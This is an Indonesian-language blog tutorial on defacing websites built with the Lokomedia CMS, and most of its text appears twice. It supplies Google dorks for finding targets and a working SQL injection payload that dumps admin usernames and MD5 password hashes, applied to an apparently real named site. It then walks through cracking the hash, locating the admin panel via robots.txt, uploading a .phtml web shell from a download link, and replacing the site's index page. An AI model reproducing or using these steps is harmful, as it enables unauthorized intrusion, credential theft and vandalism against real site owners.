Tutorial Deface dengan cara Sql Lokomedia Terbaru 2025
Oh iyaah aku mau share cara deface lagi nih , tapi dengan cara yg berbeda :v , kali ini aku share cara deface dengan cara SQL LOKOMEDIA :v
Oh iya sebelum aku kasih tahu tutornya , ane mau nanya nih :v , Kalian semua malem jum'at ini ngapain saja >:( , jangan jangan ........... ahh sudahlah lupakan :v ... Yuk disimak caranya :V
Bahan Bahan :
#Dork : inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html [ Kembangkan lagi dorknya biar dpet web yg vuln, oh iya aku kasih tahu nih kalau mau kembangkan dork ini tinggal ubah saja ANGKA nya ]
#Bagi yang belum pnya shell format .phtml bisa di download disini ~>https://uploadfiles.io/72upn
password shellnya : akugans
#Exploit :
'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
#Admin finder online/admin finder tools jg boleh :v
#oh yaa , saran aku sih sambil dengerin musik Marshmello :v
Caranya :
1. seperti biasanya kita buka Google trus masukin dork yg diatas , terus pilih salah satu websitenya tapi cari yang ada halaman statisnya :v, lihat gambar :v
2. Nah aku sudah dapat targetnya nih, kan di url target tertulis
http://sewakursimejamurah.com/statis-1-profil.html
ada statis-1-profil.html kan? nih liat gambar
3. Nah pas sesudah angka sisipkan exploitnya maka akan jadi seperti ini
http://sewakursimejamurah.com/statis-1'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
[ sesudah di sisipkan exploitnya skrg tekan enter, dan liat di tab atas tertulis [ ,admin,06c43bd.....] nah klo di atas tab muncul begitu brrti username sma password udh ketebak :v, untuk melihat username dan passwordnya sekarang klo untuk di Pc/komputer/Laptop pencet Ctrl+U mungkin klo di hp bisa tambahin doang [ view-source: ] di awal url linknya :v, liat gambar :v
4. Khan sudah kamu ctrl+u tuh , nah sekarang lihat disitu tertulis admin,09....... nah itu dia username sma passwordnya, OH IYA ITU BUKAN PASSWORD ASLINYA , TAPI KITA HARUS HASH PASSWORDNYA DLU BIAR BISA DAPAT PASSWORD ASLINYA
5. Ok kita kan Sudah tahu nih yaa kan username sama passwordnya yang msih dalam bentuk Md5 sekarang kita Copy passwordnya itu yang di samping kanan tulisan admin, nah copy angkanya sa'atnya kita hash online passwordnya dihttps://hashkiller.co.uk/md5-decrypter.aspx ,,, nah dan jreng jreng aku sudah berhasil nih gan dapat password aslinya :v, Untuk melihat password aslinya nanti akan muncul di sebelah kanan, nih liat gambar
6. Nah kan sudah dapat password aslinya tuh, sekarang kita cari dimana admin loginnya, bisa pakai adminfinder online, bisa juga pakai admin finder tools :v, bisa juga pakie cara manual nih aku ajarkan , caranya
*misalkan web ini : http://sewakursimejamurah.com
*Kita tambahkan /robots.txt di akhir urlnya maka akan jadi seperti inihttp://sewakursimejamurah.com/robots.txt
nah pas kita tambahkan /robots.txt maka akan muncul tulisan
User-agent: *
Disallow: /adminw36
[ Nah kita liat deh tuh yang tulisan disallow nya, karena itu disallownya /adminw36 berarti halaman admin login ada dihttp://sewakursimejamurah.com/adminw36] , paham kan? lihat gambar :v
7. Sekarang kita coba login dengan username sama password yang sudah kita hash tadi , halaman admin login ada disinihttp://sewakursimejamurah.com/adminw36kalau sudah berhasil masuk maka tampilan-nya akan seperti ini
8. Daaaaan Boom!!! kita sudah berhasil masuk sebagai admin di web sewakursimejamurah.com wkwkwk :v, oh iya cara tanam shellnya bagaimana? iya kalem aku jelaskan :v
OK , dimana tempat buat tanam shellnya? lihat tulisan [ Media Trus Pilih Download ] kan? nah disitu kita tanam shellnya , lihat gambar :v
9. Nah itu udh ada file nya :v, itu juga shell ane :v , udh ane tanem :v jadi ane ga usah tanam lagi yaah :v , sekarang kita klik tulisan [ Tambah Download ] , Nah trus pilih deh shell kamu , tampilannya kaya ini :v
10. INGET BRO BACA BAIK BAIK : upload shellnya harus format .phtml
jadi yg belom punya sudah aku sediakan tuh diatas link buat download shellnya :v
11. ok klo shell sudah berhasil ke upload sekarang kita cari akses shellnya/ bisa dibilang dimana shell kamu berada caranya? ok gini caranya kita cukup tambahkan /files/namashellkamu . jadi kaya ginihttp://sewakursimejamurah.com/files/shell.phtml;[ Nah yg Shell.phtml itu lu ubah aja sesuaikan dengan nama shell yang sudah kamu upload tadi gan :v ... nah dan jreng jreng aku sudah ketemu nih akses shellnya lihat gambar :v
hehe terserah deh mau diapakan :v , Tebas index juga gapapa :v
TAPI INGAT klo mau tebas index , diusahakan di backup indexnya kasihan adminnya bikin script indexnya lagi :'(
Kalau mau jadi bajingan jadi sekalian jangan tanggung tanggung , tapi kalau mau jadi bajingan tapi ragu-ragu mending jangan
h3h3 sudah itu saja ya :v, ok cukup sekian tutor dari aku, aku akan share-share cara deface yang lainnya , see you next time guys :v
Oh iya klo ada link atau gambar yang ga muncul atau ada yang ga ngerti bisa langsung kontak aku
Oh iya sebelum aku kasih tahu tutornya , ane mau nanya nih :v , Kalian semua malem jum'at ini ngapain saja >:( , jangan jangan ........... ahh sudahlah lupakan :v ... Yuk disimak caranya :V
Bahan Bahan :
#Dork : inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html [ Kembangkan lagi dorknya biar dpet web yg vuln, oh iya aku kasih tahu nih kalau mau kembangkan dork ini tinggal ubah saja ANGKA nya ]
#Bagi yang belum pnya shell format .phtml bisa di download disini ~>https://uploadfiles.io/72upn
password shellnya : akugans
#Exploit :
'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
#Admin finder online/admin finder tools jg boleh :v
#oh yaa , saran aku sih sambil dengerin musik Marshmello :v
Caranya :
1. seperti biasanya kita buka Google trus masukin dork yg diatas , terus pilih salah satu websitenya tapi cari yang ada halaman statisnya :v, lihat gambar :v
2. Nah aku sudah dapat targetnya nih, kan di url target tertulis
http://sewakursimejamurah.com/statis-1-profil.html
ada statis-1-profil.html kan? nih liat gambar
3. Nah pas sesudah angka sisipkan exploitnya maka akan jadi seperti ini
http://sewakursimejamurah.com/statis-1'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
[ sesudah di sisipkan exploitnya skrg tekan enter, dan liat di tab atas tertulis [ ,admin,06c43bd.....] nah klo di atas tab muncul begitu brrti username sma password udh ketebak :v, untuk melihat username dan passwordnya sekarang klo untuk di Pc/komputer/Laptop pencet Ctrl+U mungkin klo di hp bisa tambahin doang [ view-source: ] di awal url linknya :v, liat gambar :v
4. Khan sudah kamu ctrl+u tuh , nah sekarang lihat disitu tertulis admin,09....... nah itu dia username sma passwordnya, OH IYA ITU BUKAN PASSWORD ASLINYA , TAPI KITA HARUS HASH PASSWORDNYA DLU BIAR BISA DAPAT PASSWORD ASLINYA
5. Ok kita kan Sudah tahu nih yaa kan username sama passwordnya yang msih dalam bentuk Md5 sekarang kita Copy passwordnya itu yang di samping kanan tulisan admin, nah copy angkanya sa'atnya kita hash online passwordnya dihttps://hashkiller.co.uk/md5-decrypter.aspx ,,, nah dan jreng jreng aku sudah berhasil nih gan dapat password aslinya :v, Untuk melihat password aslinya nanti akan muncul di sebelah kanan, nih liat gambar
6. Nah kan sudah dapat password aslinya tuh, sekarang kita cari dimana admin loginnya, bisa pakai adminfinder online, bisa juga pakai admin finder tools :v, bisa juga pakie cara manual nih aku ajarkan , caranya
*misalkan web ini : http://sewakursimejamurah.com
*Kita tambahkan /robots.txt di akhir urlnya maka akan jadi seperti inihttp://sewakursimejamurah.com/robots.txt
nah pas kita tambahkan /robots.txt maka akan muncul tulisan
User-agent: *
Disallow: /adminw36
[ Nah kita liat deh tuh yang tulisan disallow nya, karena itu disallownya /adminw36 berarti halaman admin login ada dihttp://sewakursimejamurah.com/adminw36] , paham kan? lihat gambar :v
7. Sekarang kita coba login dengan username sama password yang sudah kita hash tadi , halaman admin login ada disinihttp://sewakursimejamurah.com/adminw36kalau sudah berhasil masuk maka tampilan-nya akan seperti ini
8. Daaaaan Boom!!! kita sudah berhasil masuk sebagai admin di web sewakursimejamurah.com wkwkwk :v, oh iya cara tanam shellnya bagaimana? iya kalem aku jelaskan :v
OK , dimana tempat buat tanam shellnya? lihat tulisan [ Media Trus Pilih Download ] kan? nah disitu kita tanam shellnya , lihat gambar :v
9. Nah itu udh ada file nya :v, itu juga shell ane :v , udh ane tanem :v jadi ane ga usah tanam lagi yaah :v , sekarang kita klik tulisan [ Tambah Download ] , Nah trus pilih deh shell kamu , tampilannya kaya ini :v
10. INGET BRO BACA BAIK BAIK : upload shellnya harus format .phtml
jadi yg belom punya sudah aku sediakan tuh diatas link buat download shellnya :v
11. ok klo shell sudah berhasil ke upload sekarang kita cari akses shellnya/ bisa dibilang dimana shell kamu berada caranya? ok gini caranya kita cukup tambahkan /files/namashellkamu . jadi kaya ginihttp://sewakursimejamurah.com/files/shell.phtml;[ Nah yg Shell.phtml itu lu ubah aja sesuaikan dengan nama shell yang sudah kamu upload tadi gan :v ... nah dan jreng jreng aku sudah ketemu nih akses shellnya lihat gambar :v
hehe terserah deh mau diapakan :v , Tebas index juga gapapa :v
TAPI INGAT klo mau tebas index , diusahakan di backup indexnya kasihan adminnya bikin script indexnya lagi :'(
Kalau mau jadi bajingan jadi sekalian jangan tanggung tanggung , tapi kalau mau jadi bajingan tapi ragu-ragu mending jangan
h3h3 sudah itu saja ya :v, ok cukup sekian tutor dari aku, aku akan share-share cara deface yang lainnya , see you next time guys :v
Oh iya klo ada link atau gambar yang ga muncul atau ada yang ga ngerti bisa langsung kontak aku
Posting Komentar untuk "Tutorial Deface dengan cara Sql Lokomedia Terbaru 2025"